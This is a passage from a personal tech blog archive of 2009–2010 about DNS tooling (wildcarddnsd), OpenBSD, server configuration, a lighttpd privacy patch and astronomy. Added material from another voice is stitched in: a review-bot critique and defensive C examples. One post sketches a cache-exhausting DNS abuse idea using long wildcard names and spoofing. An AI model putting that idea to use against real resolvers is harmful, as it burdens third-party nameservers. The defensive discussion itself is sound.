(gdb) quit
setebos$ 


Sphere.C

October 6th, 2009

Yesterday I came across some formulas which I haven't used in more than a decade and I made a program out of them, here is what the input and output looks like:

setebos$ ./sphere 1737 # moon         
Sphere with radius of 1737.000000
AREA   = 37914863.86
VOLUME = 21952706175.03
setebos$ ./sphere 3396 # mars         
Sphere with radius of 3396.000000
AREA   = 144925640.08
VOLUME = 164055824574.20
setebos$ ./sphere 71492 # jupiter     
Sphere with radius of 71492.000000
AREA   = 64228053049.52
VOLUME = 1530597322872156.00

And here is the source code including the formula for area and volume of a sphere:

#include <stdio.h>
#include <stdlib.h>
#include <math.h>

int
main(int argc, char *argv[])
{
        double volume, radius;
        double area;

        if (argc != 2) {
                fprintf(stderr, "usage: ./sphere [radius]\n");
                exit(1);
        }

        radius = atof(argv[1]);

        volume = (4 * M_PI * (pow(radius, 3))) / 3;
        area = 4 * M_PI * (pow(radius, 2));

        printf("Sphere with radius of %f\n", radius);
        printf("AREA   = %.2f\n", area);
        printf("VOLUME = %.2f\n", volume);

        exit(0);
}


No Hackepedia this week (again)

October 16th, 2009

The header says it all.


2 letter .de domains

October 17th, 2009

On October 23rd starting at 9AM CEST, DENIC will open registrations for two letter .de domains. Other than saving bandwidth and being rare there is nothing special about 2 letter .de domains. There are 676 of them if you exclude numbers. Here is the story (in German) about this at heise.de.

Joker.com has pre-registrations on the 19th of October.



OpenBSD 4.6 released

October 19th, 2009

OpenBSD 4.6 was released yesterday. I'm gonna have fun with this.

I just made a 15 euro bank donation to OpenBSD (which is 23 Canadian dollars). I'm doing this in lieu of buying the CDs, but I'm looking forward to perhaps getting 4.8 on CD next year.


Thanks OpenBSD

October 25th, 2009

Theo de Raadt added my name to the list of people who do donations on their donations page. The list is quite large by now, and I always wondered why I wasn't added before. It turns out that if your donations accumulate to a certain amount (100 dollars CA or so) they put your name on the list. This is nice, it's a nice self-endorsement and it shows my passion for OpenBSD.


New features at WildcardDNS

October 25th, 2009

Someone asked if round-robin'ing was possible in wildcarddnsd. The feature was there once so there was still stub-code but it didn't work. I cleaned that up today and it seems to work. It makes wildcarddnsd a bit slower because the zones have to be written after every lookup, but otherwise NS, A and AAAA records do a wildcard round-robin now.

It's not in the repo HEAD yet but if you check out the ROUNDROBIN branch the code is added on to BETA_2.


Hackepedia back online

October 27th, 2009

Hackepedia is back online after about a month of downtime.


Playing with xearth

November 2nd, 2009

rosalind$ history
...
44      xearth -pos "fixed 49 0" -sunpos "-15 0" -noroot -nostars -grid -markerfile markerfile
rosalind$ more markerfile
50.05 10.23 "pbug"


WildcardDNS bug fix

November 3rd, 2009

I fixed a bug in wildcarddnsd that caused zones to be 'lost'. Everyone who uses wildcarddnsd should upgrade to the latest version or tag "BETA_3". In the CVS log there is more detail on what went in since BETA_2.


Random Hackepedia

November 6th, 2009

This week's Hackepedia article is Multicast. Enjoy.


Upgrade (Hell)

November 6th, 2009

This week I purchased and installed 3 things. One, Windows 7 Home Premium edition. Two, VMware Workstation 7 and finally F-Secure 2010 Anti-Virus. I've never had an anti-virus program before so this was a first install for me.

I also downloaded Kubuntu 9.10 and installed it as my VMware host operating system. That was necessary because my old Redhat lacked some libraries that I needed for good sound support with the VMware Workstation.

So I had to move some OS's out of my active host team that I keep in the on state in VMware, in order to accommodate the 1 GB footprint of Windows 7. Windows 7 was a pain to install because VMware has crappy DVD support and using a sparse file for the DVD didn't work due to some copyright protection.

When I install Windows I compartment a superuser and a regular user. This way if there is a virus when I use windows, it can't write over system files and install a root-kit or whatever. I usually name the superuser admin. Only when installing Windows it asks to install a user and I didn't name it admin but "pjp" my usual acronym. So when I learned that I wanted to install "pjp" as a user with less privileges I had to rename the admin account. It left the home directory as "pjp" and gave my pjp user the directory of "pjp_2".

Activating the one year subscription for the anti-virus was pretty easy and I hope everything is protected now. I set it so that it scans files that I download through the web (real-time).

These were just some experiences I had with this year's upgrade. I probably won't upgrade for at least another year unless something blows up badly.


A theoretical attack on WildcardDNS and the Internet

November 7th, 2009

This post theorizes about an attack on caching recursing nameservers. Pretend someone runs wildcarddnsd and thus wildcards the entire spectrum of their domain (zone).

this.is.valid.domain.com
stupid.little.tricks.domain.com
what.dns.is.not.domain.com
These are all valid A replies if domain.com has an A record set. The only problem is that when someone uses up the entire 255 characters of a valid domain name, the other recursing nameserver theoretically stores all of this in memory for at least the time to live. So if someone looks up:
abcdef...a.domain.com (255 characters)
defghi...b.domain.com (255 characters)
.. then there is an awful lot that is stored in RAM on a nameserver.

If a botnet looks up these long domain names they can cause economic damage by wasting many many many bytes on an aggregate of foreign nameservers. And the nameserver that does the wildcarding will get the bandwidth bill for all those lookups, although there are many "root servers" that have unlimited bandwidth for 60 euros a month. It'll look like a DoS but it's not (yet it can lead to a DoS).

To save the Internet some pain, and basically to save my ass the bandwidth charges, I've implemented the -W flag on my wildcarddnsd's.

Something to read that put me up to the idea:

PS: you don't need a botnet to do some damage. If you have a link that allows spoofing you can spoof into networks that don't have ingress spoofing filters on their routers and fake a question to DNS servers that would otherwise refuse to answer you. With the amount of bandwidth one can get (50/10 Mbps) a considerable amount of damage can be done. So the protection against this is to have solid networks out there that don't allow spoofing of any kind.
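An added example (not wildcarddnsd code, and not the -W flag) of accounting for this cost on the recursing side: it counts the distinct long names cached per zone and the octets they occupy. The 200-character threshold, the budget of 3 names, the last-two-labels zone rule and the sample names are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define LONG_NAME   200   /* assumed: names this long or longer are counted */
#define ZONE_BUDGET 3     /* assumed: distinct long names tolerated per zone */
#define MAX_ZONES   8
#define MAX_NAMES   32

struct zone_stat {
    char   zone[256];
    int    distinct;                /* distinct long names cached under zone */
    size_t bytes;                   /* octets those names occupy */
    char   seen[MAX_NAMES][256];
};

static struct zone_stat zones[MAX_ZONES];
static int nzones;

/* Assumption: the zone is the last two labels (no trailing dot expected). */
const char *zone_of(const char *qname)
{
    const char *p = qname + strlen(qname);
    int dots = 0;

    while (p > qname) {
        if (p[-1] == '.' && ++dots == 2)
            return p;
        p--;
    }
    return qname;
}

struct zone_stat *find_zone(const char *zone)
{
    for (int i = 0; i < nzones; i++)
        if (strcasecmp(zones[i].zone, zone) == 0)
            return &zones[i];
    return NULL;
}

/* Record one cached name. Returns the zone's distinct long-name count,
 * 0 for names shorter than LONG_NAME, -1 if a table is full or the
 * name is longer than a domain name can be. */
int account(const char *qname)
{
    size_t len = strlen(qname);
    struct zone_stat *zs;

    if (len > 255)
        return -1;
    if (len < LONG_NAME)
        return 0;
    zs = find_zone(zone_of(qname));
    if (zs == NULL) {
        if (nzones == MAX_ZONES)
            return -1;
        zs = &zones[nzones++];
        strcpy(zs->zone, zone_of(qname));
    }
    for (int i = 0; i < zs->distinct; i++)
        if (strcasecmp(zs->seen[i], qname) == 0)
            return zs->distinct;    /* already cached: no new memory */
    if (zs->distinct == MAX_NAMES)
        return -1;
    strcpy(zs->seen[zs->distinct++], qname);
    zs->bytes += len;
    return zs->distinct;
}

int over_budget(const char *zone)
{
    struct zone_stat *zs = find_zone(zone);
    return zs != NULL && zs->distinct > ZONE_BUDGET;
}

size_t zone_bytes(const char *zone)
{
    struct zone_stat *zs = find_zone(zone);
    return zs != NULL ? zs->bytes : 0;
}

/* Constructed sample input: three 63-character labels in front of zone. */
void make_name(char *out, char fill, const char *zone)
{
    char *p = out;

    for (int l = 0; l < 3; l++) {
        for (int i = 0; i < 63; i++)
            *p++ = fill;
        *p++ = '.';
    }
    strcpy(p, zone);
}

int main(void)
{
    char name[256];

    for (char f = 'a'; f <= 'e'; f++) {
        make_name(name, f, "domain.com");
        printf("cached %zu-octet name, zone total %d\n",
            strlen(name), account(name));
    }
    account("www.other.org");       /* short name: not counted */
    printf("domain.com: %zu octets, over budget: %d\n",
        zone_bytes("domain.com"), over_budget("domain.com"));
    return 0;
}
```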


1993 Berlin wall pictures

November 9th, 2009

Pics from 1993.



Configuring a Dovecot POP3 server

November 12th, 2009

Here is the config file:

protocols = pop3 pop3s
protocol pop3 {
        listen = 62.75.160.180:110
        ssl_listen = 62.75.160.180:995
}
auth default {
        mechanisms = plain 
        passdb pam {
                args = *
        }
        userdb passwd {

        }
}
ssl = yes
ssl_cert_file = /etc/ssl/certs/dovecot.pem
ssl_key_file = /etc/ssl/private/dovecot.pem
mail_location = mbox:~/mail:INBOX=/var/mail/%u
disable_plaintext_auth = yes
I had to install the pam-devel stuff for openSUSE and add a certificate file that can be generated by a script in Dovecot's build_directory/doc.


Random Hackepedia

November 13th, 2009

Today's random Hackepedia is Symlinks.


5 Euros donated to Wikipedia

November 13th, 2009

I use Wikipedia quite often. Especially when it gets a little boring. I hope the five euros will cover my bandwidth charges, and it just wouldn't be the same with flashing banners greeting me every time I go there.


Windows 7 and IPv6

November 15th, 2009

I had some time tonight to get IPv6 in windows working, and it does work like a charm. See picture for the config (in german).

The IPv6 addresses are statically set and are behind a firewall. I can see the dancing KAME turtle with IE8.


New VPS at Hub.org

November 22nd, 2009

I started turning my home computer (uranus) off at nights since the fans are pretty loud and it's right beside my bed. This meant that for the centroid.eu zone there was a single point of failure since centroid.eu has 2 nameservers one of them being uranus.

So then I looked for a cheap VPS one that also allows me to do the TTLPATCH testing on wildcarddnsd and I've found one at hub.org. The server which I call dione is located in Panama of all places, which is far enough for a good TTL balancing.


Random Hackepedia

November 22nd, 2009

This week's RH is Perl.


My thumbprint

November 23rd, 2009

I made my thumbprint today on the scanner, it turned out pretty. Here it is. I cut it up with gimp a little changing the resolution only.


Disabling the GUI on Solaris 10

November 24th, 2009

Found this on the web.

To disable dtlogin, type the command:

# /usr/dt/bin/dtconfig -d

To enable dtlogin, type the command:

# /usr/dt/bin/dtconfig -e


Random Hackepedia

November 27th, 2009

The RH for this week is BSD.



Random Hackepedia

December 4th, 2009

This week's RH is P2P.


Google DNS

December 4th, 2009

Google made two DNS servers available, 8.8.8.8 and 8.8.4.4. With this they can read what you look up (in their logs), if you use these servers. I wouldn't use these servers other than for debugging perhaps, and I don't think Google knows what they're in for; if these nameservers catch on, I think Google will be swamped with requests that it never considered. In the end people might see service interruptions if the Google nameservers cannot cope.

PS: this isn't about advertisement anymore either. Other than knowing where you POP3 your mail there is no revenue for Google with this service. Unless they smuggle a false answer into your DNS lookup request they can't mix any advertisements into it. However imagine they "hijack" your POP3 and send you to a POP3 server that contains email advertisements, just once a day. Ohh the revenue in that would be sweet for them, and it may go unnoticed.


Monitoring program

December 6th, 2009

I've written a small program that monitors Google's nameservice. It is chrooted so that I can keep my nameservers on the server that runs it. Basically what it does is it looks up the address for pop3.solarscale.de and then compares what answer Google gives. This will log if they give any answer different from the one I know they should give.

This may be a little like spy vs. spy. But we gotta keep track of goodness somehow. When I co-administrated cvsup.ca.freebsd.org there was someone who checked us as well, as the logs could tell.


New RFC: RFC 5694

December 8th, 2009

I updated my personal collection of RFCs yesterday. I did this by getting the rfc-index.txt file from ftp://ftp.isi.edu/in-notes, then I compared this file with what I had and the script looks something like this:

awk '/^[1-5]/ { print $1 }' rfc-index.txt |\
while read i; do FILE=rfc${i}.txt ; if [ ! -f $FILE ]; \
then ftp ftp://ftp.isi.edu/in-notes/$FILE ; fi; done
So then I read over the new RFCs that it pulled down for me. One was intriguing, it is called "Peer-to-Peer (P2P) Architecture" and is found in RFC 5694. From the abstract:
   In this document, we provide a survey of P2P (Peer-to-Peer) systems.
   The survey includes a definition and several taxonomies of P2P
   systems.  This survey also includes a description of which types of
   applications can be built with P2P technologies and examples of P2P
   applications that are currently in use on the Internet.  Finally, we
   discuss architectural trade-offs and provide guidelines for deciding
   whether or not a P2P architecture would be suitable to meet the
   requirements of a given application.
If this is something you like and want to read a bit you can download the rfc from ftp://ftp.isi.edu/in-notes/rfc5694.txt or look it up through http://rfc-editor.org.


Random Hackepedia

December 11th, 2009

For this week RH is Kernel.


Solstice approaching fast

December 12th, 2009

The Solstice is here in nine days (on the 21st). What is this? It's when the sun is at its lowest point (at high noon) in the northern hemisphere, also called the winter solstice. Because our earth is tilted and the tilt in winter favours the southern hemisphere it is the summer solstice there.


Random Hackepedia

December 18th, 2009

This week's RH is MAC.


Fibre Optics, the Olympic upgrade

December 22nd, 2009

I've been collecting stories about the telecommunications upgrades done because of the Olympic games. Here is what I've found.

The Olympics aren't about just sports anymore, telecommunications benefit.


2009, a look back

December 23rd, 2009

I saw a lot of people already writing about this year so I'm going to sum up a few things that I did technically this year.

Jan 3rd, became user of sixxs.net, PJP4-SIXXS handle.

Jan 16th, first article of this blog, with a more technical side than before.

Feb 1st, first sixxs IPv6 tunnel to my static IP which I also obtained then.

May 21st, OpenBSD patch sent to OpenBSD, system/6149

Jun 8th, first initial commit of natally, natally.sourceforge.net.

Jun 9th, transfer of centroid.eu from intergenia to joker.com, who doesn't yet support v6 glue to .eu domains.

Jun 14th, 30 day trial of QNX, nice that they have pf(4).

Nov 17th, purchase of vmware workstation 7.

Nov 17+  change from redhat linux to ubuntu on uranus.centroid.eu

Nov 17+  purchase of windows 7 HE.

And those were some of the highlights this year. Natally works for me somewhat today and there were a few bugfixes to wildcarddnsd as well. I also purchased 2 GB of RAM, 1 250 GB harddrive and 1 DVD drive, all not exceeding 180 euros. My grandmother also died this year leaving me with an inheritance of a bit of money, but not much. I may purchase a new computer in 2010.


Merry Christmas

December 24th, 2009

Today is Christmas eve and in the tradition of german people we open our presents tonight. Followed by dinner, I think we're having duck or something. Anyhow, thanks for being with me for the year and have a safe and happy holiday.


Random Hackepedia

January 1st, 2010

The RH for this week is DragonflyBSD.


New Project: cryologd

January 6th, 2010

For the last few days I've been hacking away at a new program. Well, three actually. It's called cryologd and can be found at SourceForge, here (don't worry, I didn't style that page, SourceForge did).

So what's it do? It encrypts log files and doesn't write the private key (needed for decryption) to disk. This is good if your filesystem is subject to snooping. It uses routines I wrote for natally (and improves on them) which is good because every project I write I do it to build on top of them.

Let me give you an example. cryologd and natally encrypt their communications. But at some ISP they don't encrypt and all their credit cards can be read through the wire. I can now get a job perhaps implementing the crypto at the ISP, it's easier on me because I've already written this. Anyhow I wish about the job, but you never know.


Congratulations Wikipedia

January 7th, 2010

On November 13th or so of last year I donated five euros to Wikipedia. Well the fundraiser is over. They raised over 8 million dollars from more than 230,000 donors. The average donation was about 35 dollars which I'll have to keep in mind for next year's donation as someone picked up my tab so to speak. So, congratulations Wikipedia, you're the best!


Hackepedia, making hyperlinks

January 8th, 2010

I've written a script to cross reference more articles in my hackepedia backups. Here is the script, don't use it unless you understand it.

#!/bin/bash

cat /dev/null > list
for i in *.html; do
echo $i >> list
done

for i in *.html ; do
	echo working on file $i
	awk '
BEGIN { while (getline < "list") list[$0] = $0; }
{ for (i = 1; i <= NF; i++) { 
	for (j in list) {
		keyword=sprintf("%s.html", $i);
		if (keyword != ARGV[ARGC - 1] && j == keyword) {
			save = i;
			$i = sprintf("<a href=\"%s\">%s</a>", j, $save);
		} 
	}	
  }

  print;
}' $i > new/$i
done


Orion's belt led me to it

January 13th, 2010

An acquaintance in NYC made a picture of the star sky and I was dying to know what constellation it was he made a picture of. So after checking a few constellations that didn't match I left it. Today I took a look at my astronomy calendar and there was this constellation that I was looking for. It's called the Winter Triangle/Hexagon and has the stars Sirius and Aldebaran in it. My acquaintance only got half of it but I was able to reconstruct it with the gimp picture editor. Then I was able to match the Gemini constellation, that was real cool. Looking through the program Xephem, it pointed out that there was another star between Betelgeuse and Aldebaran called Bellatrix, see if you can make it out. It's visible. Also the star labelled Pollux is at the end of the line not the star immediately next to the label, that's Castor. Anyhow this is the original picture and this here is the edited picture.

PS: researching a bit further I found the centroid of the Winter Triangle called Monoceros constellation. According to William Herschel it is "one of the most beautiful sights in the heavens".

PSS: I was having so much fun, I mapped most of the star sky in the image, except of course Orion's belt which should be straightforward. Here is another one with one frame deleted and the rest merged.


Random Hackepedia

January 15th, 2010

The RH for this week is Locate.


News (natally & proteus)

January 16th, 2010


Random Hackepedia

January 22nd, 2010

This week's RH is mount.


Sun is no more

January 22nd, 2010

Well it's final. Oracle bought Sun Microsystems. Here is a picture that has been circulating:

I first became aware of Sun servers in 1995 when I used a shell account at Seneca College in Toronto which I was attending for Computer Engineering. The first time I had to administer a Sun box was in 1997 at an ISP that used an Ultra-2 for its email operations. Sun and I had a love/hate relationship but over time my respect for Sun grew. Last year I was able to acquire Solaris 10 and so this shall be the first and last purchase I made from Sun.



Old code from the past

January 24th, 2010

When I write and commit C source code to sourceforge.net I try to include functions that I can reuse in the future. That's the sole reason it's at sourceforge. However I just found some old code written in early 2001 which I sent to Theo de Raadt and it was my implementation of a pflogd which didn't exist at the time. In the end it was Can Acar's code that made it into OpenBSD also called pflogd. I realize now that my code is pretty wack but I can still use some functions over again, for example the pcap code or postgresql code may be able to be copied to a new program. But it's not worth uploading this to sourceforge.

So you can download it and study it and see countless bugs (like I just saw) and you can try porting it to current OpenBSD because somewhere along the way this must have stopped working as it doesn't compile for me on 4.6 anymore. Have fun!


Hackepedia in German

January 26th, 2010

I'm working on translating the 150 documents that I have stored on solarscale.de into german. I have done 25 or so since yesterday and I want to slow the pace a little, I'm hoping to be done by march with this. Here is a sample.


24 Years of computing History

January 27th, 2010

I started using a computer when I got a Sinclair ZX-81 from a neighbour. That was the year 1986. The thing had no tape drive and I had to keep it on while I painfully copied BASIC out of a book to play a game. Anyhow today I have the amd64 that you see in the chart below at the bottom. I'm planning to get a new computer in June that will hopefully blow all previous accumulations of CPU or RAM away. It'll run several VM's and perhaps I'll even dedicate a core to seti@home again, we'll see.

year  , computer type       , Mhz     ,acc. Mhz , RAM        ,accumulated RAM
------------------------------------------------------------------------------
1986  , Sinclair ZX-81      , 1    Mhz, 1    Mhz, 4        KB,  4         KB
1988  , Commodore C-64      , 2    Mhz, 3    Mhz, 64       KB,  68        KB
1992  , IBM-PC 386-SX25     , 25   Mhz, 28   Mhz, 4096     KB,  4164      KB
1994  , IBM-PC 486-66DX2    , 66   Mhz, 94   Mhz, 8192     KB,  12356     KB
1996  , Intel Pentium 120   , 120  Mhz, 214  Mhz, 32767    KB,  45123     KB
1999  , Intel P-II-350      , 350  Mhz, 564  Mhz, 131072   KB,  176195    KB
1999  , Intel P-II-350      , 350  Mhz, 914  Mhz, 131072   KB,  307267    KB
2000  , AMD Athlon 1000     , 992  Mhz, 1906 Mhz, 262144   KB,  569411    KB
2001  , Apple G3 iBook      , 500  Mhz, 2406 Mhz, 131072   KB,  700483    KB
2001  , Apple G4 Cube       , 450  Mhz, 2856 Mhz, 131072   KB,  831555    KB
2003  , Intel Pentium 200   , 200  Mhz, 3056 Mhz, 65535    KB,  897090    KB
2005  , AMD Athlon64 3500+  , 2200 Mhz, 5256 Mhz, 4194304  KB,  5091394   KB
------------------------------------------------------------------------------
My Linux experience started in 1994 with the 486 as well. In 1995 I started putting FreeBSD on the machine though and stayed with BSD for a number of years before going back to Linux to run vmware (I still have BSD vm's!).

Oh I should blog about the fate of these computers. The Sinclair broke, the Commodore was sold, the SX25 was stolen, the 486 abandoned when I left Canada. One PII-350 was passed down to my brother, one PII-350 was abandoned, the AMD Athlon 1000 went to my brother's in-laws, the G3 iBook broke, the G4 is passed down to my parents (I'm writing on it right now) and the P200 had a tragic fall out a 3rd floor balcony. And I only have the amd64 left of all of these.


Random Hackepedia

January 30th, 2010

The RH for this week is Mutt.


The American Manned Space Program

February 4th, 2010

Well so much for the American Manned Space Program, of which I'm a big fan I must add. But let's review what happened in the last 10 years. 12 years. NASA built the International Space Station together with the Russians and other major contributors, starting in 1998. Then GW Bush announced the Moon to Mars program, probably because going to the moon was easier than going to mars. Then President Obama just recently cancelled the Moon-to-Mars program and what we're left with is a formidable space station in orbit and a space shuttle that's retiring at the end of this year (4 more flights).

So what has happened behind the scenes, elsewhere? Well we had the Spaceship One win the Ansari X-Prize and Virgin founded Virgin Galactic so that Spaceship Two can take passengers to a non-orbiting 5 minute view of the rim of space. Also scram-jet engines have been tested in Australia but I didn't find any conclusive evidence that they are building a scram-jet just yet. Also there is a company out in the US that proposes to shoot resources into orbit out of a cannon. They are promising cheaper launch rates than what the shuttle cost by a factor of 10 or so. Then there is the space elevator that everyone dreams of but the material isn't quite strong enough for it yet. And then there have been a number of private space companies that have launched payloads into orbit, these are fairly new.

Anyhow the president of the United States probably has more insight on what technologies are best and cheapest and makes his decision based on that. So perhaps one of these things appealed to him causing NASA to lose their manned space program. Obama must be convinced that there is a better way and we'll see in time what that may be, perhaps he thinks it's too soon to tell the world. Meanwhile I read somewhere, that Europe wants to go to the Moon by 2030 which is in 20 years time. But a lot can happen in just a decade. The original moon program of the US managed to land a man on the moon in 1969 in a decade of preparation with no experience on how to do so, but the cost was so tremendous that they had to give it up. So for this situation I can only look to myself when I was a boy and wanted something real bad. When I didn't get it, after a while I didn't want it anymore and I was glad I didn't make that decision. Perhaps this is what America faces today and they'll be glad they didn't go ahead with a moon program just yet. Time will tell.


Random Hackepedia

February 5th, 2010

The RH for this week is IPsec.

The german translations are coming along at a rate of about 2 a day, like I said it'll be March when it's somewhat finished.


Winter Star Sky

February 8th, 2010

Yesterday for the first time this year the cloudy sky went away and I was able to use my dads camera to make photos of the star sky.

Check out more processed photos here.


Random Hackepedia

February 13th, 2010

The RH for this week is FreeBSD.


Bruce Schneier has a new book out!

February 15th, 2010

Bruce Schneier has written a new book. I've already ordered this and it should be delivered by March 30th, it'll be released March 15th.


OpenSMTPD bug (DoS) fixed

February 17th, 2010

Yesterday I found this bug with Mouring on IRC. Basically if you have a very long string for an email address the smtpd will quit with a truncation error in lowercase(). Gilles Chehade put in this fix, revision 1.99 of lka.c, this morning (it should be noted it's Gilles' fix, we only identified the bug and wrote to him). Everyone should update to this version or their smtpd will cease working when the DoS comes around that came around to Mouring.



The Internet Meltdown

February 18th, 2010

Yesterday I watched a Google Tech Talk on IPv6 and specifically what transition technologies exist today. The speaker basically thinks we'll have a meltdown near the end of 2011 but seemed very calm about it. I yahoo'ed for it and found this article as well. Over here I've got IPv6 connectivity but I'm wishing that my VPS would have it as well and I've asked about it repeatedly. Maybe by next year, I'm hoping, as being available in both IPv4 and IPv6 land is a must after we run out of addresses.


Random Hackepedia

February 19th, 2010

The RH for this week is Gingerale.


Modification to webserver

February 27th, 2010

Privacy just got a lot better when you visit this website. According to an article in the German magazine "C't magazin für Computer technik" (2010 Edition 5, page 154), the storage of IP data is illegal. Specifically the correlation between IP and access time. So what I've done is patch my webserver (lighttpd) accordingly to throw out the last 2 octets from the dotted quad. I can now roughly see which region you're from in my logs but not who exactly you were. I'm not interested in that anyhow, but if someone wants my logs it won't give them much.

Here is the patch:

--- mod_accesslog.c..orig       2010-02-27 17:31:49.000000000 +0100
+++ mod_accesslog.c     2010-02-27 17:38:01.000000000 +0100
@@ -742,8 +742,12 @@
                        case FORMAT_REMOTE_HOST:
 
                                /* handle inet_ntop cache */
+                               {
+                                       sock_addr myaddr = con->dst_addr;
+                                       myaddr.ipv4.sin_addr.s_addr &= 0x0000fff
f;
 
-                               buffer_append_string(b, inet_ntop_cache_get_ip(s
rv, &(con->dst_addr)));
+                                       buffer_append_string(b, inet_ntop_cache_
get_ip(srv, &myaddr));
+                               }
 
                                break;
                        case FORMAT_REMOTE_IDENT:
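
Review bot: the mask applied to `myaddr.ipv4.sin_addr.s_addr` depends on host byte order and is applied without checking the address family. `s_addr` is held in network byte order, so `&= 0x0000ffff` keeps the first two octets only on a little-endian host; on a big-endian host the same constant would keep the last two. Writing the mask as `htonl(0xffff0000)` keeps the intent on both. The new block also writes through the `ipv4` member unconditionally, so if `dst_addr` can hold an IPv6 address, that address would reach the log without being shortened by this mask; a check on the family before masking, with a separate rule for IPv6, would close that gap. A one-line comment stating that the last two octets are dropped on purpose would help whoever next merges this against upstream.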

A typical log looks like this then:

66.230.0.0 solarscale.de - [27/Feb/2010:17:46:46 +0100] "HEAD /public/rfc2516nc.mp3 HTTP/1.1" 200 0 "http://www.deezer.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

On the other VPS I have in Panama I'm not going to apply this patch because I'm unsure of what the legalities are there. This should only affect the centroid.eu domain though, and if you wish to read only from the German server use solarscale.de. Cheers!


Random Hackepedia

February 27th, 2010

The RH for this week is Integer.


The Hunter and his dog

February 27th, 2010

Yesterday I was able to see the starsky again. I took these pictures of Sirius and Orion through the trees.


Wildcarddns does global load balancing

March 2nd, 2010

Well I finally got around to wildcarddnsd again and trashed all stuff I wrote for it. That was yesterday. I was able to hack up some new stuff that uses a sort of firewall ruleset to determine where a nameserver comes from and then serve based on that information to which server the request should go. I got it running in beta (centroid.eu) watch closely.

The following is a ping from proteus (germany) to centroid.eu, the IP it gives is proteus itself (also germany).

pjp@proteus:~/blog> ping -c 1 centroid.eu
PING centroid.eu (62.75.160.180) 56(84) bytes of data.
64 bytes from proteus.solarscale.de (62.75.160.180): icmp_seq=1 ttl=64 time=0.063 ms

--- centroid.eu ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.063/0.063/0.063/0.000 ms

The next is a ping from dione (panama) to centroid.eu. The IP it gives is dione itself, similar to the above ping:

goldflipper% ping -c 1 centroid.eu
PING centroid.eu (200.46.208.61): 56 data bytes
64 bytes from 200.46.208.61: icmp_seq=0 ttl=64 time=0.027 ms

--- centroid.eu ping statistics ---
1 packets transmitted, 1 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 0.027/0.027/0.027/0.000 ms

Now there have been a few ethical debates whether DNS should "lie" or not and I think in favour of loadbalancing it should lie and tell an IP that's closest to the client. This is still in beta and I'm watching it closely and then I'll merge it into HEAD.

PS: I've balanced it in such a way that IP's coming from RIPE and APNIC go to the server in Germany, and ARIN and LACNIC go to the server in Panama. I haven't dealt with the other regions yet, they may get defaulted to LACNIC.


Downtime

March 4th, 2010

Today I woke up to proteus.solarscale.de not pinging anymore. The downtime was around 3.5 hours as the provider that I use did some repairs on the main server that proteus is a vm guest on. In that time I updated the DNS table for solarscale and added uranus.centroid.eu as a mailserver. It would have worked getting _some_ mail because the TTL on the zone is 86400 and I mainly just get mailing lists. Unfortunately it turns out that the OpenSMTPD that I use doesn't recognize aliases (bug) and returned mail with a 530 message. No mail was really lost as the remote mailservers attempt to deliver again but it was annoying. I sent gilles@ an email explaining the error message that I got, perhaps he can get a fix in before the OpenBSD 4.7 release.

PS: oh yeah proteus had an uptime of 410 days before this mishap.


Random Hackepedia

March 5th, 2010

The RH for this week is Sed.


DNS compression in a DNS question?

March 5th, 2010

How does that work? I have pretty well sandboxed my windows machine behind a firewall and I use wildcarddnsd to read off what hosts it tries to reach. Well..wildcarddnsd refused some questions because they had a DNS compression inside it, which doesn't make sense since it would create an endless loop IMO. Here is the dropped packet warning:

Mar  5 11:10:40 rosalind wildcarddnsd[30362]: question has compressed name, drop
Mar  5 11:10:40 rosalind wildcarddnsd[30362]: on descriptor 5 interface "127.0.0.1" malformed question from 172.16.0.10, drop

So I logged the packet with my firewall and ...

Mar 05 11:10:40.349416 rule 1/(match) [uid 0, pid 814] rdr in on vic1: 172.16.0.10.62485 > 127.0.0.1.8053: [udp sum ok] udp 35 (ttl 255, id 329, len 63)
  0000: 4500 003f 0149 0000 ff11 8f49 ac10 000a  E..?.I..ÿ..I¬...
  0010: 7f00 0001 f415 1f75 002b 92a3 86e8 0100  ....ô..u.+.£.è..
  0020: 0001 0000 0000 0000 0264 7207 5f64 6e73  .........dr._dns
  0030: 2d73 6404 5f75 6470 01c4 0000 0c00 01    -sd._udp.Ä.....

On offset 0x39 it shows c4, definitely a DNS compression; the offset is 0x400, which seems bogus. I wonder if this is a bonjour packet intended to kill firewalls. Rather silly.
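
An added example (not wildcarddnsd's code): a bounds-checked C walker for a DNS name that treats an octet as a compression pointer only when it sits in a length position, refuses pointers unless the caller allows them, and accepts only pointers that land before the start of the labels being read, so a pointer loop cannot hang it. `dumped_query` is transcribed from the hex dump above; the other two messages and all function names are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DNS_HDR_LEN 12
enum { NAME_OK = 0, NAME_TRUNCATED = -1, NAME_POINTER = -2,
       NAME_BAD_LABEL = -3, NAME_TOO_LONG = -4 };

/* Transcribed from the hex dump: the 35-byte UDP payload at 0x1c-0x3e. */
static const uint8_t dumped_query[] = {
    0x86,0xe8, 0x01,0x00, 0x00,0x01, 0x00,0x00, 0x00,0x00, 0x00,0x00,
    0x02,'d','r', 0x07,'_','d','n','s','-','s','d', 0x04,'_','u','d','p',
    0x01,0xc4, 0x00,            /* length 1, data 0xc4, then root label */
    0x00,0x0c, 0x00,0x01 };     /* QTYPE 12 (PTR), QCLASS 1 (IN) */

/* Constructed: label "a" at offset 12, then a pointer back to offset 12. */
static const uint8_t loop_query[] = {
    0x12,0x34, 0x01,0x00, 0x00,0x01, 0x00,0x00, 0x00,0x00, 0x00,0x00,
    0x01,'a', 0xc0,0x0c, 0x00,0x01, 0x00,0x01 };

/* Constructed fragment: question "a" at offset 12, and a later name at
 * offset 19 that is a legitimate backward pointer to it. */
static const uint8_t backref_msg[] = {
    0x12,0x34, 0x81,0x80, 0x00,0x01, 0x00,0x01, 0x00,0x00, 0x00,0x00,
    0x01,'a',0x00, 0x00,0x01, 0x00,0x01, 0xc0,0x0c };

/* Decode the name at msg[off] into dotted text (\DDD for unprintable
 * octets). *next receives the offset just past the name as it appears
 * at off. allow_ptr = 0 is the strict policy for a question section. */
int parse_name(const uint8_t *msg, size_t len, size_t off, int allow_ptr,
               char *out, size_t outlen, size_t *next)
{
    size_t pos = off, seg_start = off, o = 0, wire = 0;
    int jumped = 0;

    if (outlen == 0) return NAME_TOO_LONG;
    for (;;) {
        if (pos >= len) return NAME_TRUNCATED;
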